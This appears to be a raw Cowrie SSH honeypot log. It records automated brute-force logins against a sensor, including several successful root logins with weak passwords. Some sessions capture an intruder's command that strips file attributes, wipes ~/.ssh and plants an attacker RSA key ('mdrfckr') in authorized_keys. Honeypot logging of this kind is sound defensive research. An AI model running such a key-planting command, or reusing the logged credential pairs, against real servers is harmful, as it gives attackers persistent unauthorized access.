{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:00.654820Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:00.919251Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.login.success","username":"root","password":"poiuytrewq","message":"login attempt [root/poiuytrewq] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:26:01.971499Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:26:02.575037Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:26:02.575730Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:26:02.576795Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:02.840741Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:26:03.389175Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:26:03.390012Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:26:03.656592Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:03.657545Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":58584,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b8c903d7758","protocol":"ssh","message":"New connection: 103.59.95.12:58584 (1.2.3.4:22) [session: 4b8c903d7758]","sensor":"my-vps","timestamp":"2025-09-09T04:26:03.927251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:03.928041Z","src_ip":"103.59.95.12","session":"4b8c903d7758"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:04.195498Z","src_ip":"103.59.95.12","session":"4b8c903d7758"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":39002,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ccc1e6f029","protocol":"ssh","message":"New connection: 92.118.39.62:39002 (1.2.3.4:22) [session: 41ccc1e6f029]","sensor":"my-vps","timestamp":"2025-09-09T04:26:04.590881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:26:04.591817Z","src_ip":"92.118.39.62","session":"41ccc1e6f029"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:26:04.621662Z","src_ip":"92.118.39.62","session":"41ccc1e6f029"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qaz2wsx","message":"login attempt [admin/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-09-09T04:26:04.712291Z","src_ip":"92.118.39.62","session":"41ccc1e6f029"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:05.744283Z","src_ip":"92.118.39.62","session":"41ccc1e6f029"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:26:05.779866Z","src_ip":"103.59.95.12","session":"4b8c903d7758"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:07.069410Z","src_ip":"103.59.95.12","session":"4b8c903d7758"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":50834,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb2e2cea9331","protocol":"ssh","message":"New connection: 103.59.95.12:50834 (1.2.3.4:22) [session: eb2e2cea9331]","sensor":"my-vps","timestamp":"2025-09-09T04:26:07.340953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:07.342061Z","src_ip":"103.59.95.12","session":"eb2e2cea9331"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:07.619147Z","src_ip":"103.59.95.12","session":"eb2e2cea9331"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:26:09.023829Z","src_ip":"103.59.95.12","session":"eb2e2cea9331"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:09.296357Z","src_ip":"103.59.95.12","session":"fb1af0a53182"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:09.299132Z","src_ip":"103.59.95.12","session":"eb2e2cea9331"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":60572,"dst_ip":"1.2.3.4","dst_port":22,"session":"0308ed12cca4","protocol":"ssh","message":"New connection: 51.81.118.153:60572 (1.2.3.4:22) [session: 0308ed12cca4]","sensor":"my-vps","timestamp":"2025-09-09T04:26:16.825270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:16.825988Z","src_ip":"51.81.118.153","session":"0308ed12cca4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:16.927794Z","src_ip":"51.81.118.153","session":"0308ed12cca4"}
{"eventid":"cowrie.login.failed","username":"smbuser","password":"1234","message":"login attempt [smbuser/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:26:17.375100Z","src_ip":"51.81.118.153","session":"0308ed12cca4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:18.482026Z","src_ip":"51.81.118.153","session":"0308ed12cca4"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":45918,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7aa2232dd63","protocol":"ssh","message":"New connection: 154.209.4.55:45918 (1.2.3.4:22) [session: a7aa2232dd63]","sensor":"my-vps","timestamp":"2025-09-09T04:26:32.196475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:32.201729Z","src_ip":"154.209.4.55","session":"a7aa2232dd63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:32.402140Z","src_ip":"154.209.4.55","session":"a7aa2232dd63"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T04:26:33.221603Z","src_ip":"154.209.4.55","session":"a7aa2232dd63"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:34.436168Z","src_ip":"154.209.4.55","session":"a7aa2232dd63"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":47460,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d859b71fa10","protocol":"ssh","message":"New connection: 192.210.135.20:47460 (1.2.3.4:22) [session: 8d859b71fa10]","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.008006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.009145Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.118123Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.login.success","username":"root","password":"ys123456","message":"login attempt [root/ys123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.597226Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:26:47.830235Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.830955Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.832059Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.844674Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.session.closed","duration":180.2309947013855,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.849343Z","src_ip":"212.227.235.229","session":"207f48165c88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:47.942611Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:26:48.266822Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.267484Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.378402Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.379318Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":48818,"dst_ip":"1.2.3.4","dst_port":22,"session":"268ccb525bcc","protocol":"ssh","message":"New connection: 192.210.135.20:48818 (1.2.3.4:22) [session: 268ccb525bcc]","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.487160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.487831Z","src_ip":"192.210.135.20","session":"268ccb525bcc"}
